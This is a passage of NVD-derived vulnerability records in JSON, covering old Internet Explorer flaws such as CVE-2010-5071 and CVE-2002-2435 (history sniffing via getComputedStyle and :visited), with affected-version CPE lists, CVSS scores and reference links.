"url": "http://www.zdnet.com/blog/security/pwn2own-2012-ie-9-hacked-with-two-0day-vulnerabilities/10621"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://arstechnica.com/business/news/2012/03/ie-9-on-latest-windows-gets-stomped-at-hacker-contest.ars"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://pwn2own.zerodayinitiative.com/status.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://twitter.com/vupen/statuses/177895844828291073"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.zdnet.com/blog/security/pwn2own-2012-ie-9-hacked-with-two-0day-vulnerabilities/10621"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Deferred",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-119"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
FKIE_CVE-2010-5071
Vulnerability from fkie_nvd - Published: 2011-12-07 19:55 - Updated: 2025-04-11 00:51
Severity ?
Summary
The JavaScript implementation in Microsoft Internet Explorer 8.0 and earlier does not properly restrict the set of values contained in the object returned by the getComputedStyle method, which allows remote attackers to obtain sensitive information about visited web pages by calling this method.
References
Impacted products
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:microsoft:ie:7.0.6000.16711:*:*:*:*:*:*:*",
"matchCriteriaId": "77497F7F-1853-448A-8448-8FB6FA43169B",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:ie:8.0.7600.16385:*:*:*:*:*:*:*",
"matchCriteriaId": "1B5A9719-9C14-4843-A6A9-CF4AF804B37D",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:ie:8.0b:*:*:*:*:*:*:*",
"matchCriteriaId": "587DAAD1-F33D-41EB-B752-36B9D87FC19B",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:*:*:*:*:*:*:*:*",
"matchCriteriaId": "CB024757-60F3-44F9-BCFF-04B2F109D7A2",
"versionEndIncluding": "8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:3.0:*:*:*:*:*:*:*",
"matchCriteriaId": "1BBF9241-A175-438C-A793-3D245BE2AE35",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:3.0.1:*:*:*:*:*:*:*",
"matchCriteriaId": "F62AC866-A06F-47DB-AEDF-E345CE0B14A4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:3.0.2:*:*:*:*:*:*:*",
"matchCriteriaId": "943D5C5C-FC49-4EDE-AE75-A79CFF42208E",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:3.1:*:*:*:*:*:*:*",
"matchCriteriaId": "59EB6841-0427-479B-8771-06DF62EE3C87",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:3.2:*:*:*:*:*:*:*",
"matchCriteriaId": "8873A08F-D4C7-46FC-8FE5-972644F85ADA",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:4.0:*:*:*:*:*:*:*",
"matchCriteriaId": "A5B815D9-BC21-4A17-AF00-B8AD181027D7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:4.0.1:*:*:*:*:*:*:*",
"matchCriteriaId": "42502347-DD40-4F8C-9861-C0A88A3F8608",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:4.0.1:sp1:*:*:*:*:*:*",
"matchCriteriaId": "0AF9C64F-9A67-4BA9-A653-75507935E6EA",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:4.0.1:sp2:*:*:*:*:*:*",
"matchCriteriaId": "C375A9AA-505B-444C-A45F-2BAAD0B2CD0D",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:4.01:*:*:*:*:*:*:*",
"matchCriteriaId": "B9D82B89-456D-41CB-A894-B6A22FB4415D",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:4.1:*:*:*:*:*:*:*",
"matchCriteriaId": "44FF4E47-AD75-42C7-BB84-42BBA46A58B2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:4.01:sp1:*:*:*:*:*:*",
"matchCriteriaId": "2E21CE6E-2B33-4225-B1DC-C19F1D578040",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:4.5:*:*:*:*:*:*:*",
"matchCriteriaId": "1B26CE22-E730-4247-853E-5E640DB3ECB5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:4.40.308:*:*:*:*:*:*:*",
"matchCriteriaId": "0A652453-AB5F-405C-ABDE-CE1B54FEACED",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:4.40.520:*:*:*:*:*:*:*",
"matchCriteriaId": "141080AB-48DE-4885-BAB6-6F0937ABD49B",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:4.70.1155:*:*:*:*:*:*:*",
"matchCriteriaId": "EB758D76-B7F6-4E87-B88D-620443655CA9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:4.70.1158:*:*:*:*:*:*:*",
"matchCriteriaId": "28655AC5-1512-4F45-9963-CA26F73981CE",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:4.70.1215:*:*:*:*:*:*:*",
"matchCriteriaId": "C00F4F36-B88A-4FDB-BE52-83C6EF60BDB7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:4.70.1300:*:*:*:*:*:*:*",
"matchCriteriaId": "BEC05584-F553-4D29-9C46-C9EE5F0CB166",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:4.71.544:*:*:*:*:*:*:*",
"matchCriteriaId": "B108A86E-8387-446C-B823-BE6FCAE747A5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:4.71.1008.3:*:*:*:*:*:*:*",
"matchCriteriaId": "BA3F79B8-512A-4B88-868C-7C4ADFD223C9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:4.71.1712.6:*:*:*:*:*:*:*",
"matchCriteriaId": "078C3A86-C9F8-4A19-9DDC-1065B54E640F",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:4.72.2106.8:*:*:*:*:*:*:*",
"matchCriteriaId": "9030923C-356E-4FAB-8E64-03D462B4DB5F",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:4.72.3110.8:*:*:*:*:*:*:*",
"matchCriteriaId": "DC0FFABC-8BED-4838-85FE-406DC9CF9B92",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:4.72.3612.1713:*:*:*:*:*:*:*",
"matchCriteriaId": "C9DB4A00-4F70-4189-81BD-9318C52DF2D2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5:*:*:*:*:*:*:*",
"matchCriteriaId": "B4071D03-D955-4C1B-ACD8-A864F7D0FA02",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.0:*:*:*:*:*:*:*",
"matchCriteriaId": "E6B8985B-B927-4928-B1DB-18E29F796992",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.0.1:*:*:*:*:*:*:*",
"matchCriteriaId": "3A04FEA6-37B0-44B0-844F-55652ABA1F85",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.0.1:sp1:*:*:*:*:*:*",
"matchCriteriaId": "4D56FB8E-2553-47C1-82A2-9E59023780CE",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.0.1:sp2:*:*:*:*:*:*",
"matchCriteriaId": "8541EEED-94F4-42F8-9719-57F3EC85D52B",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.0.1:sp3:*:*:*:*:*:*",
"matchCriteriaId": "40372520-08CF-4F64-A7AC-7E0AE0964138",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.0.1:sp4:*:*:*:*:*:*",
"matchCriteriaId": "2EB39B99-91A0-4B70-B12A-BA37F6AFBA83",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.00.0518.10:*:*:*:*:*:*:*",
"matchCriteriaId": "FBFE8C8E-F46C-4179-AE83-CE4720C8E0E9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.00.0910.1309:*:*:*:*:*:*:*",
"matchCriteriaId": "61125B09-23AA-4D5A-8332-6B5CCD80C7A6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.00.2014.0216:*:*:*:*:*:*:*",
"matchCriteriaId": "3AECF59F-B3C0-44CC-B77A-30E32B3E8BB5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.00.2314.1003:*:*:*:*:*:*:*",
"matchCriteriaId": "D4690B85-86B9-448E-9249-B3885DEDC60E",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.00.2516.1900:*:*:*:*:*:*:*",
"matchCriteriaId": "4E215C82-E4AD-4B87-92D8-DD4D486EB6EF",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.00.2614.3500:*:*:*:*:*:*:*",
"matchCriteriaId": "D91F4C80-3B1B-45BD-966F-C9DBF98B875D",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.00.2919.800:*:*:*:*:*:*:*",
"matchCriteriaId": "F65E0DC1-40F6-4252-945A-A972343D1E29",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.00.2919.3800:*:*:*:*:*:*:*",
"matchCriteriaId": "8C07C1A9-1A94-4653-8C57-6FCFC25854E4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.00.2919.6307:*:*:*:*:*:*:*",
"matchCriteriaId": "EDC57519-AD96-4ECF-A5B2-4E45F7D55298",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.00.2920.0000:*:*:*:*:*:*:*",
"matchCriteriaId": "37DE3DE6-A355-41F2-BF5E-E7526449E753",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.00.3103.1000:*:*:*:*:*:*:*",
"matchCriteriaId": "5DB24B4F-44FF-4F0F-90FA-240A34B9599F",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.00.3105.0106:*:*:*:*:*:*:*",
"matchCriteriaId": "919A6551-DB18-49BD-AB92-4C453B3B728F",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.00.3314.2101:*:*:*:*:*:*:*",
"matchCriteriaId": "C512DAB3-2720-42D2-B27E-28F30FE0FE46",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.00.3315.1000:*:*:*:*:*:*:*",
"matchCriteriaId": "CB90458F-1F2B-4F4C-88C6-4B670787D126",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.00.3502.1000:*:*:*:*:*:*:*",
"matchCriteriaId": "6C2EFDB4-97C2-4DDF-8A65-FCFB60FCB540",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.00.3700.1000:*:*:*:*:*:*:*",
"matchCriteriaId": "4A99CDC7-9341-4DFB-BB18-FF06C05FF9B0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.01:*:*:*:*:*:*:*",
"matchCriteriaId": "6219D36E-9E2C-4DC7-8FD5-FAD144A333F6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.1:*:*:*:*:*:*:*",
"matchCriteriaId": "B1CFF390-FF33-45CA-BC96-C6766491C616",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.01:sp1:*:*:*:*:*:*",
"matchCriteriaId": "3BFFB565-F656-43E3-89E1-E412DC4C9D41",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.01:sp2:*:*:*:*:*:*",
"matchCriteriaId": "BD3A3282-8842-4708-AF7B-0AFBEB5D4F9A",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.01:sp3:*:*:*:*:*:*",
"matchCriteriaId": "F4336F0E-75FE-4592-9D98-4F689804956E",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.01:sp4:*:*:*:*:*:*",
"matchCriteriaId": "F3F2A51E-2675-4993-B9C2-F2D176A92857",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.2.3:*:*:*:*:*:*:*",
"matchCriteriaId": "DA6E5E4B-9E95-4019-8622-6E707FEC2FF6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.5:*:*:*:*:*:*:*",
"matchCriteriaId": "40F8042F-C621-45AE-9F8C-70469579643A",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.5:preview:*:*:*:*:*:*",
"matchCriteriaId": "8E93C22E-812E-4CDA-9850-2386CE1E817A",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.5:sp1:*:*:*:*:*:*",
"matchCriteriaId": "2CD04E07-3664-4D4F-BF3E-6B33AF0F2D12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.5:sp2:*:*:*:*:*:*",
"matchCriteriaId": "D05ED9D0-CF78-4FAD-9371-6FB3D5825148",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.50.3825.1300:*:*:*:*:*:*:*",
"matchCriteriaId": "8BA6BA38-8B3B-4B9A-95BF-BCD412DD83B6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.50.4030.2400:*:*:*:*:*:*:*",
"matchCriteriaId": "01BD2A05-3FCE-4C5D-8228-968630F27E28",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.50.4134.0100:*:*:*:*:*:*:*",
"matchCriteriaId": "4430779C-C678-4950-AE9E-82CDFC1A08D7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.50.4134.0600:*:*:*:*:*:*:*",
"matchCriteriaId": "BF0EC334-AEAD-43CA-A609-C027060F4F20",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.50.4308.2900:*:*:*:*:*:*:*",
"matchCriteriaId": "BAF320BE-F022-4E0E-9815-B8AEED87B384",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.50.4522.1800:*:*:*:*:*:*:*",
"matchCriteriaId": "75532B2D-6814-4D20-8AEB-E7DFD66B6423",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:5.50.4807.2300:*:*:*:*:*:*:*",
"matchCriteriaId": "83802E30-8E7D-4CAB-B8FC-10056CF833D6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6:*:*:*:*:*:*:*",
"matchCriteriaId": "693D3C1C-E3E4-49DB-9A13-44ADDFF82507",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6:sp1:*:*:*:*:*:*",
"matchCriteriaId": "D47247A3-7CD7-4D67-9D9B-A94A504DA1BE",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6.0:*:*:*:*:*:*:*",
"matchCriteriaId": "A19F6133-25D1-44A5-B6B9-354703436783",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6.00.2462.0000:*:*:*:*:*:*:*",
"matchCriteriaId": "314538E8-48EC-4869-9074-2A1F5B7CBB3C",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6.00.2479.0006:*:*:*:*:*:*:*",
"matchCriteriaId": "F56B3A72-7C5E-4F0C-BBC7-AA13DDFBEE70",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6.0.2600:*:*:*:*:*:*:*",
"matchCriteriaId": "68656E52-AD8A-474E-9160-CD5F8857254B",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6.00.2600.0000:*:*:*:*:*:*:*",
"matchCriteriaId": "6876CE89-AA70-44C5-8A69-E2ED7A63F570",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6.0.2800:*:*:*:*:*:*:*",
"matchCriteriaId": "93F47C82-E767-47A8-88DE-417B004ED7FC",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6.0.2800.1106:*:*:*:*:*:*:*",
"matchCriteriaId": "F86E7189-CE21-4007-A3FA-39A6B51A5AB9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6.00.2800.1106:*:*:*:*:*:*:*",
"matchCriteriaId": "BCE2555F-C4BE-482F-8DD9-976D2026058C",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6.0.2900:*:*:*:*:*:*:*",
"matchCriteriaId": "7B90EA4B-DA10-44B7-BD3D-6AE1197212D5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6.0.2900.2180:*:*:*:*:*:*:*",
"matchCriteriaId": "7CBF9B51-5AF4-4317-9768-21D866AC7990",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6.00.2900.2180:*:*:*:*:*:*:*",
"matchCriteriaId": "61F352FE-C22E-4B33-A46F-77A164B5DABB",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6.00.3663.0000:*:*:*:*:*:*:*",
"matchCriteriaId": "5ACD5A44-0926-4A1B-9900-1E7CC0A561C8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6.00.3718.0000:*:*:*:*:*:*:*",
"matchCriteriaId": "196CEE37-2E3A-41A7-9AC1-0D5CC3F35D8F",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6.00.3790.0000:*:*:*:*:*:*:*",
"matchCriteriaId": "3E16BEF4-71AA-4E23-B438-D25FFABDB646",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6.00.3790.1830:*:*:*:*:*:*:*",
"matchCriteriaId": "1F32702E-F955-4DDB-B235-7C47E882453C",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:6.00.3790.3959:*:*:*:*:*:*:*",
"matchCriteriaId": "6FA2B4AD-C04D-4A6B-8570-5A2F5489F750",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:7:*:*:*:*:*:*:*",
"matchCriteriaId": "1A33FA7F-BB2A-4C66-B608-72997A2BD1DB",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:7.0:*:*:*:*:*:*:*",
"matchCriteriaId": "6BC71FD8-D385-4507-BD14-B75FDD4C79E6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:7.0:beta:*:*:*:*:*:*",
"matchCriteriaId": "506711D9-6E57-4EED-8628-36C7F2324040",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:7.0:beta1:*:*:*:*:*:*",
"matchCriteriaId": "ED471260-0272-431F-A91E-AC2883D92497",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:7.0:beta2:*:*:*:*:*:*",
"matchCriteriaId": "63D18070-EC48-4904-9AE0-558F7F3B869D",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:7.0:beta3:*:*:*:*:*:*",
"matchCriteriaId": "86584E3F-3B0D-4018-A186-E59F3B01CA5C",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:7.0.5730:unknown:gold:*:*:*:*:*",
"matchCriteriaId": "817636ED-5E42-460E-89F1-24D5C64AB8BE",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:7.0.5730.11:*:*:*:*:*:*:*",
"matchCriteriaId": "0E6E1020-1017-4670-9316-27C79F1E2698",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:7.00.5730.1100:*:*:*:*:*:*:*",
"matchCriteriaId": "37F63AE1-8FC9-4C0F-8D19-F17DFA214E94",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:7.00.6000.16386:*:*:*:*:*:*:*",
"matchCriteriaId": "35B1186A-FA5B-4E49-8C2F-BCD2D45F22A2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:7.00.6000.16441:*:*:*:*:*:*:*",
"matchCriteriaId": "53D75496-8594-44DB-B5C4-EA3CABD6551A",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:8.0.6001:*:*:*:*:*:*:*",
"matchCriteriaId": "5F709B61-F64B-4E8F-80BB-4944485B6125",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:8.0.6001:beta:*:*:*:*:*:*",
"matchCriteriaId": "612B8367-DAEF-4EE3-BC57-16A5CF4D3030",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "The JavaScript implementation in Microsoft Internet Explorer 8.0 and earlier does not properly restrict the set of values contained in the object returned by the getComputedStyle method, which allows remote attackers to obtain sensitive information about visited web pages by calling this method."
},
{
"lang": "es",
"value": "La ejecuci\u00f3n de JavaScript en Microsoft Internet Explorer v8.0 y anteriores, no restringe adecuadamente el conjunto de valores contenidos en el objeto devuelto por el m\u00e9todo getComputedStyle, lo que permite a atacantes remotos obtener informaci\u00f3n sensible acerca de las p\u00e1ginas web visitadas por llamar a este m\u00e9todo."
}
],
"id": "CVE-2010-5071",
"lastModified": "2025-04-11T00:51:21.963",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
]
},
"published": "2011-12-07T19:55:01.470",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Exploit"
],
"url": "http://w2spconf.com/2010/papers/p26.pdf"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit"
],
"url": "http://w2spconf.com/2010/papers/p26.pdf"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Deferred",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-264"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
FKIE_CVE-2002-2435
Vulnerability from fkie_nvd - Published: 2011-12-07 19:55 - Updated: 2025-04-11 00:51
Severity ?
Summary
The Cascading Style Sheets (CSS) implementation in Microsoft Internet Explorer 8.0 and earlier does not properly handle the :visited pseudo-class, which allows remote attackers to obtain sensitive information about visited web pages via a crafted HTML document, a related issue to CVE-2010-2264.
References
Impacted products
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:microsoft:ie:7.0.6000.16711:*:*:*:*:*:*:*",
"matchCriteriaId": "77497F7F-1853-448A-8448-8FB6FA43169B",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:ie:8.0.7600.16385:*:*:*:*:*:*:*",
"matchCriteriaId": "1B5A9719-9C14-4843-A6A9-CF4AF804B37D",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:ie:8.0b:*:*:*:*:*:*:*",
"matchCriteriaId": "587DAAD1-F33D-41EB-B752-36B9D87FC19B",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:*:*:*:*:*:*:*:*",
"matchCriteriaId": "CB024757-60F3-44F9-BCFF-04B2F109D7A2",
"versionEndIncluding": "8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:3.0:*:*:*:*:*:*:*",
"matchCriteriaId": "1BBF9241-A175-438C-A793-3D245BE2AE35",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:3.0.1:*:*:*:*:*:*:*",
"matchCriteriaId": "F62AC866-A06F-47DB-AEDF-E345CE0B14A4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:3.0.2:*:*:*:*:*:*:*",
"matchCriteriaId": "943D5C5C-FC49-4EDE-AE75-A79CFF42208E",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:3.1:*:*:*:*:*:*:*",
"matchCriteriaId": "59EB6841-0427-479B-8771-06DF62EE3C87",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:3.2:*:*:*:*:*:*:*",
"matchCriteriaId": "8873A08F-D4C7-46FC-8FE5-972644F85ADA",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:4.0:*:*:*:*:*:*:*",
"matchCriteriaId": "A5B815D9-BC21-4A17-AF00-B8AD181027D7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:4.0.1:*:*:*:*:*:*:*",
"matchCriteriaId": "42502347-DD40-4F8C-9861-C0A88A3F8608",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:4.0.1:sp1:*:*:*:*:*:*",
"matchCriteriaId": "0AF9C64F-9A67-4BA9-A653-75507935E6EA",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:4.0.1:sp2:*:*:*:*:*:*",
"matchCriteriaId": "C375A9AA-505B-444C-A45F-2BAAD0B2CD0D",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:4.01:*:*:*:*:*:*:*",
"matchCriteriaId": "B9D82B89-456D-41CB-A894-B6A22FB4415D",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:4.1:*:*:*:*:*:*:*",
"matchCriteriaId": "44FF4E47-AD75-42C7-BB84-42BBA46A58B2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:4.01:sp1:*:*:*:*:*:*",
"matchCriteriaId": "2E21CE6E-2B33-4225-B1DC-C19F1D578040",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:4.5:*:*:*:*:*:*:*",
"matchCriteriaId": "1B26CE22-E730-4247-853E-5E640DB3ECB5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:4.40.308:*:*:*:*:*:*:*",
"matchCriteriaId": "0A652453-AB5F-405C-ABDE-CE1B54FEACED",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:4.40.520:*:*:*:*:*:*:*",
"matchCriteriaId": "141080AB-48DE-4885-BAB6-6F0937ABD49B",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:4.70.1155:*:*:*:*:*:*:*",
"matchCriteriaId": "EB758D76-B7F6-4E87-B88D-620443655CA9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:4.70.1158:*:*:*:*:*:*:*",
"matchCriteriaId": "28655AC5-1512-4F45-9963-CA26F73981CE",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:4.70.1215:*:*:*:*:*:*:*",
"matchCriteriaId": "C00F4F36-B88A-4FDB-BE52-83C6EF60BDB7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:4.70.1300:*:*:*:*:*:*:*",
"matchCriteriaId": "BEC05584-F553-4D29-9C46-C9EE5F0CB166",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:4.71.544:*:*:*:*:*:*:*",
"matchCriteriaId": "B108A86E-8387-446C-B823-BE6FCAE747A5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:4.71.1008.3:*:*:*:*:*:*:*",
"matchCriteriaId": "BA3F79B8-512A-4B88-868C-7C4ADFD223C9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:4.71.1712.6:*:*:*:*:*:*:*",
"matchCriteriaId": "078C3A86-C9F8-4A19-9DDC-1065B54E640F",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:microsoft:internet_explorer:4.72.2106.8:*:*:*:*:*:*:*",
